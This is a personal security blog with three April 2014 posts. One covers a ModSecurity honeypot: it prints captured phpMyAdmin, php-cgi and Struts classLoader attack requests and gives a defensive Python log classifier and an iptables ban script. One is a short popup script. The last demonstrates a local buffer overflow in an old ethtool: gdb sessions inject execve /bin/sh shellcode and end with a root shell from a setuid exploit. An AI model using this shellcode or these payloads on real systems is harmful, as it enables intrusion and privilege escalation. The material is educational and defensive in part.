Sunday, 27 April 2014

[EN] Bots in the log

A few weeks ago I decided to create another mini-honeypot.
To do this, I used an Apache server with ModSecurity installed.

After a few modifications to the existing rules, the next thing was to
write some 'log reader' to quickly check whether there is something
new (and interesting) in the logs or not. And of course, to
learn more about how bots talk to my machine,
where they want to connect, and what 'exploits' they are
using.

During the last few weeks I observed multiple GET and POST
requests to Apache (where I have only an index.html and a robots.txt
file, but that wasn't a hint for the attackers, because they scanned for
all possible vulnerabilities anyway ;)).

For example, a few very frequent requests were related to vulnerable phpMyAdmin installations and other old webapps:
---<code>---
# grep GET modsec_audit.log
GET /phpTest/zologize/axa.php HTTP/1.1
GET /phpMyAdmin/scripts/setup.php HTTP/1.1
GET /pma/scripts/setup.php HTTP/1.1
GET /myadmin/scripts/setup.php HTTP/1.1
GET / HTTP/1.1
GET /robots.txt HTTP/1.1
---<code>---

It is not a problem to find out which vulnerabilities were being
targeted; let's google it:

---<code>---
POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1
---<code>---

As you can see, there is a very useful post (by SpiderLabs) about this vulnerability.

Of course you can now fetch the 'tools' referenced by this kind of POST (http://attackers-host/histool)
and read them. Often you will find a bash script trying to download pscan or some exploit to get root on your machine.

Kind of fun ;)

But probably nothing new...

Anyway, in the last few days I found an interesting line in the logs:
---<code>---
162.213.24.40 - - [25/Apr/2014:22:38:05 +0200] "GET /toplel.action?class[%27classLoader%27][%27resources%27][%27dirContext%27][%27docBase%27]=//162.213.24.40/toplel HTTP/1.0" 403 466 "-" "-"
---<code>---

I was a little surprised, because this was the first time I saw it in my logs. So I tried to find some information on Google, and that's how I found a very nice post at the SpamBotSecurity Forum
explaining that this is a bug in Apache Struts; also please check this.

(Also 'toplel' seems to be malware)

Probably in the future I will post something new about it here,
but for now, if you want, you can check my simple log reader to verify
whether you will find something interesting in your logs.
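The author's own log reader is not on the page, so here is an added example (not the author's script) of what such a reader can look like: it parses Apache combined-format log lines, percent-decodes the request target, and flags the three request families shown above (phpMyAdmin setup.php probes, php-cgi query strings carrying interpreter switches such as `-d`, and Struts `class['classLoader']` manipulation). It also prints the response status, so you can see at a glance whether ModSecurity already answered 403 or whether the request got a 200 and deserves a closer look. The sample log lines are constructed (TEST-NET addresses) except the Struts line, which is the one quoted in the post; the combined log format is assumed.

```python
import re
from urllib.parse import unquote, unquote_plus

# Apache combined log format: client IP, identd, user, [timestamp], "request", status, size, ...
# (assumption: the honeypot logs in the standard combined format, as the line quoted in the post does)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_request(req):
    """Split a request line into (method, decoded path, decoded query).

    Both path and query are percent-decoded so that encoded probes such as
    %2D%64 ('-d') or %27classLoader%27 can be matched in their plain form."""
    parts = req.split(" ")
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    return method, unquote(path), unquote_plus(query)


# --- signatures for the three request families seen in the post -------------
def is_pma_setup_probe(method, path, query):
    """phpMyAdmin setup.php scans (/phpMyAdmin, /pma, /myadmin, ...)."""
    return path.endswith("/scripts/setup.php")


def is_php_cgi_argv(method, path, query):
    """php-cgi query strings that smuggle interpreter switches (-d, -s, -n) as arguments."""
    return "/cgi-bin/php" in path and re.search(r"(?:^|\s)-[dsn]\b", query) is not None


def is_struts_classloader(method, path, query):
    """Struts ClassLoader manipulation via class['classLoader'] parameters."""
    return re.search(r"class\[.{0,3}classLoader", query) is not None


SIGNATURES = [
    ("phpmyadmin-setup", is_pma_setup_probe),
    ("php-cgi-argv", is_php_cgi_argv),
    ("struts-classloader", is_struts_classloader),
]


def classify(line):
    """Return (ip, status, [matching signature names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, status = m.group("ip"), int(m.group("status"))
    parsed = parse_request(m.group("req"))
    if parsed is None:
        return ip, status, []
    hits = [name for name, pred in SIGNATURES if pred(*parsed)]
    return ip, status, hits


def scan(lines):
    """Yield (ip, status, hits) for every line that matches at least one signature."""
    for line in lines:
        result = classify(line)
        if result is not None and result[2]:
            yield result


# Sample log: lines 1, 2 and 4 are constructed; line 3 is the Struts request quoted in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2014:03:12:44 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 403 466 "-" "-"',
    '192.0.2.11 - - [21/Apr/2014:11:02:01 +0200] "POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64 HTTP/1.1" 200 312 "-" "-"',
    '162.213.24.40 - - [25/Apr/2014:22:38:05 +0200] "GET /toplel.action?class[%27classLoader%27][%27resources%27][%27dirContext%27][%27docBase%27]=//162.213.24.40/toplel HTTP/1.0" 403 466 "-" "-"',
    '192.0.2.12 - - [25/Apr/2014:22:40:00 +0200] "GET /robots.txt HTTP/1.1" 200 68 "-" "-"',
]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        # a 403 means ModSecurity already blocked the request; a 200 deserves a closer look
        verdict = "blocked" if status == 403 else "NOT blocked"
        print(f"[+] {ip:<15} {status} {verdict:<11} {', '.join(hits)}")
```

Run it against a real file with `scan(open("/var/log/apache2/access.log"))`; decoding before matching is the important part, because the bots encode almost every byte of the php-cgi payload precisely to slip past naive `grep` patterns.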

Of course you can use another simple script to block
this kind of requests. Check this out:
---<code>---
# cat ban_modsec.sh
#!/bin/sh

# Simple script to block all IPs found in the mod_security audit log.
# Section A of every audit entry looks like:
#   [25/Apr/2014:22:38:05 +0200] UniqueID 162.213.24.40 56789 10.0.0.1 80
# so the 4th space-separated field is the client address.
# Note: 'grep 200 | grep 2014' only matches those header lines because this
# host logs in the +0200 timezone and the year is 2014; adjust if that differs.
MODSLOG="/var/log/apache2/modsec_audit.log"
BANLOG="2ban.log"

# unique IP addresses to block
grep 200 "$MODSLOG" | grep 2014 | cut -d' ' -f 4 | sort -u > "$BANLOG"

echo ""
echo "In the last mod_security log, found : [$(wc -l < "$BANLOG")]"
echo ""

while read -r line; do
        # only hand values that look like an IPv4 address to iptables
        case "$line" in
                ""|*[!0-9.]*) continue ;;
        esac
        iptables -A INPUT -s "$line" -j DROP
        echo "[+] $line - banned"
done < "$BANLOG"

date >> "$BANLOG"
echo "-------------------------------------------" >> "$BANLOG"
echo "[+] Done."

---<code>---

If you have any ideas on how we can build more secure servers,
feel free to write a comment here.

Enjoy ;)

Tuesday, 15 April 2014

[EN] Just allow popup

---<code>---
k@lab:~/public_html/js$ cat xxx.html
<!-- seems to be simple ;]                        -->
<!-- of course will work only with popups enabled -->

<script>
function NewTab(url){
        // open the given URL in a new tab and bring it to the front
        var hi=window.open(url, '_blank');
        // window.open returns null when the popup is blocked, so guard the focus() call
        if (hi) { hi.focus(); }
}
NewTab(window.location.href);
</script>
k@lab:~/public_html/js$
---<code>---


;]

Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During the last few days I was checking some old apps for Slackware 9.1.

My goal was to find some useful bugs to write a few exploits (just for practice, of course).
During simple fuzzing, I found that 'ethtool' is vulnerable to buffer overflows in a few places.

Below is a short note from testing (overflow in the '-k' parameter):

---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface.  See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS

Version 3 - January 27, 2005

        * Feature: r8159 register dump support
        * Feature / bug fix: Support advertising gigabit ethernet
        * Bug fix: make sure to advertise 10baseT-HD
        * Other minor bug fixes.

Version 2 - August 17, 2004
 

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Offload parameters for 1ŔPh//shh/binăPSá°
                                         Íű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2$ whoami
tester
sh-3.2$

---<code>---

A few more ethtool options are also vulnerable (apparently the same buffer, since the same offset works):
---<code>---

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -K ` perl -e 'print "A"x44,"BBBB"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -K ` perl -e 'print "A"x44,"BBBB"'`
no offload settings changed

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -r ` perl -e 'print "A"x44,"BBBB"'`
Cannot restart autonegotiation: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -p ` perl -e 'print "A"x44,"BBBB"'`
Cannot identify NIC: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -t ` perl -e 'print "A"x44,"BBBB"'`
Cannot get driver information: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -s ` perl -e 'print "A"x44,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

---<code>---

And if ethtool is owned by root and has the set-uid bit (+s), we get:
---<code>---

tester@box:~/code/tests/ethtool-3 $ ls -la ethtool
-rwsr-sr-x 1 root root 203201 Apr  9 15:19 ethtool
tester@box:~/code/tests/ethtool-3 $ ./exthtool

        -=[ ethtool - local buffer overflow exploit ]=-

Offload parameters for 1ŔPh//shh/binăPSá°
                                         Í°ű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2# whoami
root
sh-3.2#

---<code>---

That's all :)
Happy hunting!

o/